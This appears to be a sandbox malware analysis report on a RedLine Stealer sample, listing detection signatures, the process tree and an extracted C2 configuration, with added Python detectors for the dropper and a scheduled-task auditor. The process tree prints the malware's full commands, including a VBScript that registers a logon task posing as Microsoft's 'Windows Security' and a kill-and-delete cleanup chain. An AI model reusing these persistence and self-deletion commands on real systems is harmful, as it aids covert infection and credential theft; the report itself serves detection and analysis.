Windows Analysis Report
18561381.exe
Overview
General Information
Detection
RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Yara detected RedLine Stealer
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Sigma detected: Suspicious Script Execution From Temp Folder
Query firmware table information (likely to detect VMs)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Hides that the sample has been downloaded from the Internet (zone.identifier)
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Tries to steal Crypto Currency Wallets
Command shell drops VBS files
Changes security center settings (notifications, updates, antivirus, firewall)
Obfuscated command line found
PE file has nameless sections
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Del in CommandLine
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Sigma detected: Cscript Visual Basic Script Execution
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Creates COM task schedule object (often to register a task for autostart)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Yara detected Credential Stealer
IP address seen in connection with other malware
Enables debug privileges
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Uses taskkill to terminate processes
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries disk information (often used to detect virtual machines)
Classification
- System is w10x64
- 18561381.exe (PID: 6608, cmdline: "C:\Users\user\Desktop\18561381.exe", MD5: 68E9A902193C06E8F3289CD54FDAC054)
- build.exe (PID: 2856, cmdline: "C:\Users\user\AppData\Local\Temp\build.exe", MD5: D1DB0A92A4C72B887CC16A32E9D285A8)
- cmd.exe (PID: 5612, cmdline: C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Security\Windows Security.exe, MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 5604, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- Windows Security.exe (PID: 4312, cmdline: C:\Users\user\AppData\Roaming\Microsoft\Security\Windows Security.exe, MD5: D1DB0A92A4C72B887CC16A32E9D285A8)
- cmd.exe (PID: 6780, cmdline: "C:\Windows\System32\cmd.exe" /c @echo off & echo const TriggerTypeLogon=9 : const ActionTypeExecutable=0 : const TASK_LOGON_INTERACTIVE_TOKEN=3 : const createOrUpdateTask=6 : Set service=CreateObject("Schedule.Service") : call service.Connect() : Dim rootFolder : Set rootFolder=service.GetFolder("") : Dim taskDefinition : Set taskDefinition=service.NewTask(0) : Dim regInfo : Set regInfo=taskDefinition.RegistrationInfo : regInfo.Author="Microsoft Corporation" : regInfo.Description="Windows Security is a software application that safeguards a system from malware. It was an anti-spyware program built to fight unauthorized access and protect Windows computers from unwanted software." : Dim settings : Set settings=taskDefinition.Settings : settings.StartWhenAvailable=True : settings.ExecutionTimeLimit="PT0S" : settings.AllowHardTerminate=False : settings.IdleSettings.StopOnIdleEnd=False : settings.DisallowStartIfOnBatteries=False : settings.StopIfGoingOnBatteries=False : Dim triggers : Set triggers=taskDefinition.Triggers : Dim trigger : Set trigger=triggers.Create(TriggerTypeLogon) : userId=CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERNAME%") : trigger.Id="LogonTriggerId" : trigger.UserId=userId : Dim Action : Set Action=taskDefinition.Actions.Create(ActionTypeExecutable) : Action.Path="C:\Users\user\AppData\Roaming\Microsoft\Security\Windows Security.exe" : taskDefinition.Principal.UserId=userId : taskDefinition.Principal.LogonType=TASK_LOGON_INTERACTIVE_TOKEN : call rootFolder.RegisterTaskDefinition("Windows Security", taskDefinition, createOrUpdateTask, Empty, Empty, TASK_LOGON_INTERACTIVE_TOKEN) > C:\Users\user\AppData\Local\Temp\tmpBD82.vbs & cscript //nologo C:\Users\user\AppData\Local\Temp\tmpBD82.vbs & del C:\Users\user\AppData\Local\Temp\tmpBD82.vbs /f /q & exit, MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6772, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cscript.exe (PID: 2212, cmdline: cscript //nologo C:\Users\user\AppData\Local\Temp\tmpBD82.vbs, MD5: 956185CAF895737F30E8EE24DEFCE8E6)
- cmd.exe (PID: 2368, cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /F /PID 2856 & powershell -command "$ErrorActionPreference= 'silentlycontinue'; (Get-WmiObject Win32_Process | Where-Object { $_.Path.StartsWith('C:\Users\user\AppData\Local\Temp\build.exe') }).Terminate()" & timeout 3 > nul & del /F /S /Q /A "C:\Users\user\AppData\Local\Temp\build.exe" & exit, MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6008, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 6156, cmdline: taskkill /F /PID 2856, MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- powershell.exe (PID: 4880, cmdline: powershell -command "$ErrorActionPreference= 'silentlycontinue'; (Get-WmiObject Win32_Process | Where-Object { $_.Path.StartsWith('C:\Users\user\AppData\Local\Temp\build.exe') }).Terminate()", MD5: 95000560239032BC68B4C2FDFCDEF913)
- timeout.exe (PID: 5340, cmdline: timeout 3, MD5: EB9A65078396FB5D4E3813BB9198CB18)
- svchost.exe (PID: 7108, cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc, MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 7156, cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p, MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 2084, cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p, MD5: 32569E403279B3FD2EDB7EBD036273FA)
- SgrmBroker.exe (PID: 5524, cmdline: C:\Windows\system32\SgrmBroker.exe, MD5: D3170A3F3A9626597EEE1888686E3EA6)
- svchost.exe (PID: 4816, cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc, MD5: 32569E403279B3FD2EDB7EBD036273FA)
- MpCmdRun.exe (PID: 5532, cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable, MD5: A267555174BFA53844371226F482B86B)
- conhost.exe (PID: 5528, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- svchost.exe (PID: 4972, cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p, MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 6152, cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 6924, cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p, MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 1972, cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p, MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 4504, cmdline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc, MD5: 32569E403279B3FD2EDB7EBD036273FA)
- Windows Security.exe (PID: 4336, cmdline: C:\Users\user\AppData\Roaming\Microsoft\Security\Windows Security.exe, MD5: D1DB0A92A4C72B887CC16A32E9D285A8)
- cleanup
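The two cmd.exe chains in the process tree are what the Sigma hits in the signature list refer to. The first echoes a VBScript that registers a logon-triggered task named "Windows Security" (author set to "Microsoft Corporation", ExecutionTimeLimit "PT0S", AllowHardTerminate False) whose action is the copy under AppData\Roaming, runs it with cscript and deletes it. The second kills build.exe by PID, terminates any process with that image path through WMI Win32_Process as well, and deletes the file from Temp. The Python below is an added example and not part of the report or of Joe Sandbox: it encodes those patterns as simple command-line checks and runs them over the command lines from the tree above (the VBS body is shortened to the tokens the checks use), the way one would run them over Sysmon Event ID 1 or Security 4688 CommandLine fields. The pattern names are my own and only loosely correspond to the Sigma rule titles above.

```python
import re

# Command lines taken from this report's process tree, used as sample input. The VBS body
# inside the second entry is shortened to the tokens the checks look at; the last entry is
# a benign svchost line from the same tree, kept as a negative case.
SAMPLE_CMDLINES = [
    r'"C:\Users\user\Desktop\18561381.exe"',
    (r'"C:\Windows\System32\cmd.exe" /c @echo off & echo const TriggerTypeLogon=9 : '
     r'Set service=CreateObject("Schedule.Service") : '
     r'call rootFolder.RegisterTaskDefinition("Windows Security", taskDefinition, '
     r'createOrUpdateTask, Empty, Empty, TASK_LOGON_INTERACTIVE_TOKEN) '
     r'> C:\Users\user\AppData\Local\Temp\tmpBD82.vbs '
     r'& cscript //nologo C:\Users\user\AppData\Local\Temp\tmpBD82.vbs '
     r'& del C:\Users\user\AppData\Local\Temp\tmpBD82.vbs /f /q & exit'),
    r'cscript //nologo C:\Users\user\AppData\Local\Temp\tmpBD82.vbs',
    (r'"C:\Windows\System32\cmd.exe" /c taskkill /F /PID 2856 & powershell -command '
     r'''"$ErrorActionPreference= 'silentlycontinue'; (Get-WmiObject Win32_Process '''
     r'''| Where-Object { $_.Path.StartsWith('C:\Users\user\AppData\Local\Temp\build.exe') }).Terminate()" '''
     r'& timeout 3 > nul & del /F /S /Q /A "C:\Users\user\AppData\Local\Temp\build.exe" & exit'),
    r'C:\Windows\System32\svchost.exe -k netsvcs -p',
]

SCRIPT_EXT = r"\.(?:vbs|vbe|js|jse|wsf)"
TEMP_DIR = r"(?:\\AppData\\Local\\Temp\\|\\Windows\\Temp\\)"
SCRIPT_HOST = r"\b[cw]script(?:\.exe)?\b[^&]*"   # cscript/wscript and its arguments up to the next '&'
FLAGS = re.IGNORECASE

# Shell redirection into a script file: '> C:\...\x.vbs'
REDIRECT_TO_SCRIPT = re.compile(r">\s*(?P<script>[^\s&\"]+" + SCRIPT_EXT + r")", FLAGS)
# Script host launched with a script that lives in a temp directory
SCRIPT_FROM_TEMP = re.compile(SCRIPT_HOST + TEMP_DIR + r"[^\s&\"]+" + SCRIPT_EXT, FLAGS)
# taskkill followed, later in the same command line, by del of an .exe in a temp directory
KILL_THEN_DELETE = re.compile(r"\btaskkill\b.*\bdel\b[^&]*" + TEMP_DIR + r"[^\s&\"]+\.exe", FLAGS)


def analyze(cmdline):
    """Return the set of pattern names one command line matches."""
    hits = set()
    low = cmdline.lower()
    m = REDIRECT_TO_SCRIPT.search(cmdline)
    if m:
        script = re.escape(m.group("script"))
        if re.search(SCRIPT_HOST + script, cmdline, FLAGS):
            hits.add("script_dropper")            # shell writes a script and runs it itself
        if re.search(r"\bdel\b[^&]*" + script, cmdline, FLAGS):
            hits.add("script_deleted_after_run")  # and removes it in the same command line
    if SCRIPT_FROM_TEMP.search(cmdline):
        hits.add("script_exec_from_temp")
    if "schedule.service" in low and "registertaskdefinition" in low:
        hits.add("scheduled_task_via_com")        # persistence through the Task Scheduler COM API
    if KILL_THEN_DELETE.search(cmdline):
        hits.add("kill_then_delete_temp_exe")     # a stage removing itself once the next one runs
    if "win32_process" in low and ".terminate()" in low:
        hits.add("wmi_process_terminate")         # same intent as taskkill, done through WMI
    return hits


def scan(cmdlines):
    """Map the index of every command line that matched anything to its sorted pattern names."""
    report = {}
    for i, cmdline in enumerate(cmdlines):
        hits = analyze(cmdline)
        if hits:
            report[i] = sorted(hits)
    return report


if __name__ == "__main__":
    for i, names in scan(SAMPLE_CMDLINES).items():
        print(f"[{i}] {', '.join(names)}")
```

Each check deliberately keys on a relationship inside one command line (the same .vbs path being written, executed and deleted; taskkill and del naming a Temp executable) rather than on any single token, which is what separates this chain from an administrator running cscript by hand.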
Malware configuration (extracted from the sample):
{"C2 url": ["65.108.82.103:15914"], "Bot Id": "@JABKA9983", "Authorization Header": "3da459a4f4fcd6fe99288a78b3680c31"}
The C2 entry is a bare host:port without a scheme; 15914 is the non-standard port that the "Detected TCP or UDP traffic on non-standard ports" signature above flags, so the address and port are the network indicators to block or hunt for.
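The task registered by the VBS in the process tree above is what remains on the host after the sandbox run: a logon-triggered task whose action is an executable under the user's AppData\Roaming while RegistrationInfo.Author claims "Microsoft Corporation". The Python below is an added example, not part of the report or of Joe Sandbox, that audits Task Scheduler XML definitions for exactly that mismatch and for the settings the VBS sets (logon trigger, ExecutionTimeLimit PT0S, AllowHardTerminate false, StartWhenAvailable true). Both XML documents are constructed for this example: the first mirrors the task definition in the command line above, the second is a placeholder benign task; neither was captured from the sandbox. The audit_task_dir default assumes the on-disk task store under C:\Windows\System32\Tasks, whose files are UTF-16 XML, one per task.

```python
import os
import xml.etree.ElementTree as ET

# Namespace of every task definition the Task Scheduler stores.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Path fragments a task claiming Microsoft authorship should not be launching from
# (user-writable or commonly user-writable locations).
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")

# Constructed: what the Task Scheduler would store for the task the VBS registers
# (author "Microsoft Corporation", logon trigger, action under AppData\Roaming).
SUSPICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Author>Microsoft Corporation</Author>
    <Description>Windows Security is a software application that safeguards a system from malware.</Description>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger id="LogonTriggerId"><UserId>user</UserId></LogonTrigger>
  </Triggers>
  <Principals>
    <Principal><UserId>user</UserId><LogonType>InteractiveToken</LogonType></Principal>
  </Principals>
  <Settings>
    <StartWhenAvailable>true</StartWhenAvailable>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <AllowHardTerminate>false</AllowHardTerminate>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
  </Settings>
  <Actions>
    <Exec><Command>C:\Users\user\AppData\Roaming\Microsoft\Security\Windows Security.exe</Command></Exec>
  </Actions>
</Task>
"""

# Constructed placeholder for a legitimate task: Microsoft author, action under the system directory.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Microsoft Corporation</Author></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions><Exec><Command>%SystemRoot%\System32\example.exe</Command></Exec></Actions>
</Task>
"""


def audit_task_xml(xml_text):
    """Return a sorted list of suspicious traits in one task definition (empty if none)."""
    root = ET.fromstring(xml_text)
    author = root.findtext("t:RegistrationInfo/t:Author", default="", namespaces=NS).strip()
    commands = [(c.text or "").strip() for c in root.findall("t:Actions/t:Exec/t:Command", NS)]
    findings = set()
    for cmd in commands:
        if any(frag in cmd.lower() for frag in USER_WRITABLE):
            findings.add("exec_from_user_writable_path")
            if author.lower().startswith("microsoft"):
                findings.add("microsoft_author_user_path_mismatch")
    if not findings:
        return []  # the remaining traits only matter together with a bad action path
    if root.find("t:Triggers/t:LogonTrigger", NS) is not None:
        findings.add("runs_at_logon")
    settings = root.find("t:Settings", NS)
    if settings is not None:
        def setting(name):
            return settings.findtext("t:" + name, default="", namespaces=NS).strip().lower()
        if setting("ExecutionTimeLimit") == "pt0s":
            findings.add("no_execution_time_limit")
        if setting("AllowHardTerminate") == "false":
            findings.add("hard_terminate_disabled")
        if setting("StartWhenAvailable") == "true":
            findings.add("start_when_available")
    return sorted(findings)


def audit_task_dir(tasks_dir=r"C:\Windows\System32\Tasks"):
    """Walk the on-disk task store and map each flagged task file to its traits."""
    report = {}
    for dirpath, _, files in os.walk(tasks_dir):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-16") as fh:
                    traits = audit_task_xml(fh.read())
            except (OSError, UnicodeError, ET.ParseError):
                continue
            if traits:
                report[path] = traits
    return report


if __name__ == "__main__":
    for label, xml_text in (("constructed 'Windows Security' task", SUSPICIOUS_TASK),
                            ("constructed benign task", BENIGN_TASK)):
        print(label, "->", audit_task_xml(xml_text) or "clean")
```

The action path is the discriminating check; author strings and descriptions are free text and, as this sample shows, are chosen to look like Microsoft's. The settings checks are reported only alongside a bad action path so that legitimate long-running tasks do not clutter the output.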
Rule | Description | Author
---|---|---
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen

Rule | Description | Author
---|---|---
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security

Rule | Description | Author
---|---|---
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Rule | Description | Author
---|---|---
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
System Summary
- Author: Florian Roth, Max Altgelt
- Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community
- Author: frack113
- Author: frack113
- Author: frack113
- Author: frack113
- Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
- Author: frack113
- Author: frack113
- Author: frack113
- Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
AV Detection
- Malware Configuration Extractor
- Virustotal
- ReversingLabs
- Avira
- Metadefender
- ReversingLabs
- Metadefender
- ReversingLabs
- Joe Sandbox ML
- Joe Sandbox ML
- Joe Sandbox ML
- Static PE information
- HTTPS traffic detected
- Static PE information
- Key opened (16 entries)
- JA3 fingerprint
- HTTP traffic detected (4 entries)